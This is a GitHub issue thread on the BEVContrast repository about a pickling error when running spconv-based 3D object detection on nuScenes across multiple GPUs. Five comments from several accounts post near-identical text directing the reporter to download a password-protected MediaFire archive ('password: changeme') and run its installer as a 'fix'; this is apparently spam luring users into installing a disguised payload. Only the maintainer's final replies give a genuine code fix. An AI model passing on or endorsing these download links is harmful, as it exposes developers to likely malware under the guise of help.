### ISSUE TITLE
Errors when running 3D object detection

### ISSUE THREAD

**Issue by mojingtong** [valeoai/BEVContrast#3]
Thanks for your excellent work! When I am running the 3D object detection task on nuScenes datasets, it occurs some errors as following:

Traceback (most recent call last):                                                        
  File "train.py", line 239, in <module>
    mp.spawn(main, args=(world_size,), nprocs=world_size)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/site-packages/torch/multiprocessing/spawn.py", line 230, in spawn
    return start_processes(fn, args, nprocs, join, daemon, start_method='spawn')
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/site-packages/torch/multiprocessing/spawn.py", line 188, in start_processes
    while not context.join():
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/site-packages/torch/multiprocessing/spawn.py", line 150, in join
    raise ProcessRaisedException(msg, error_index, failed_process.pid)
torch.multiprocessing.spawn.ProcessRaisedException: 

-- Process 1 terminated with the following error:
Traceback (most recent call last):
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/site-packages/torch/multiprocessing/spawn.py", line 59, in _wrap
    fn(i, *args)
  File "/disk0/cn1716/BEVContrast/train.py", line 139, in main
    train(
  File "/disk0/cn1716/BEVContrast/train.py", line 167, in train
    train_dataloader_iter = iter(train_dataloader)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 354, in __iter__
    self._iterator = self._get_iterator()
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 305, in _get_iterator
    return _MultiProcessingDataLoaderIter(self)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/site-packages/torch/utils/data/dataloader.py", line 918, in __init__
    w.start()
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/multiprocessing/process.py", line 121, in start
    self._popen = self._Popen(self)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/multiprocessing/context.py", line 224, in _Popen
    return _default_context.get_context().Process._Popen(process_obj)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/multiprocessing/context.py", line 284, in _Popen
    return Popen(process_obj)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/multiprocessing/popen_spawn_posix.py", line 32, in __init__
    super().__init__(process_obj)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/multiprocessing/popen_fork.py", line 19, in __init__
    self._launch(process_obj)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/multiprocessing/popen_spawn_posix.py", line 47, in _launch
    reduction.dump(process_obj, fp)
  File "/disk0/cn1716/conda/envs/bevcontrast/lib/python3.8/multiprocessing/reduction.py", line 60, in dump
    ForkingPickler(file, protocol).dump(obj)
TypeError: cannot pickle 'spconv.core_cc.csrc.sparse.all.ops_cpu3d.Point2VoxelCPU' object

I can not figure out the problem. Could you please give a help? Thank you so much!

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CSautier** [comment]
Hi, sorry for the delay. Could you please tell me what you are trying to run?

**Comment by CSautier** [comment]
It seems to me you are trying to run the spconv object detection backbone on multiple GPUs, which is something we didn't do in our experiments. I don't recall why we ran this experiment on a single GPU, but given that our other experiments were run on multiple GPUs, it's possible our spconv's code does not work with multiple GPUs. I will try that on my side.

**Comment by CSautier** [comment]
I can confirm that this issue appears when using spconv in multiGPU. If you need multiGPU, you can fix it by replacing in bevlab/dataloader.py l11 by `from spconv.pytorch.utils import PointToVoxel as VoxelGenerator` and l169 by `voxel_output = self._voxel_generator(torch.from_numpy(points), empty_mean=True)`.

Use at your own risk. Neither multiprocessing nor this version of VoxelGenerator have been tested.
